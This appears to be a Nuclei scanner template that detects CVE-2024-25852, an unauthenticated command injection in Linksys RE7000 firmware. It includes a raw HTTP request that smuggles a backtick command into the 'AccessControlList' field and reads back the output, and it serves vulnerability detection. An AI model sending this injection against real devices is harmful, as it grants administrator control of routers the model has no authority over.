id: CVE-2024-25852 info: name: Linksys RE7000 - Command Injection author: securityforeveryone severity: high description: | Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point impact: An attacker can use the vulnerability to obtain device administrator rights. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-25852 - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd classification: epss-score: 0.00043 epss-percentile: 0.0866 metadata: verified: true max-request: 1 vendor: Linksys product: RE7000 tags: cve,cve2024,unauth,injection variables: filename: "{{rand_base(5)}}" http: - raw: - | PUT /goform/AccessControl HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"} - raw: - | GET /{{filename}}.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and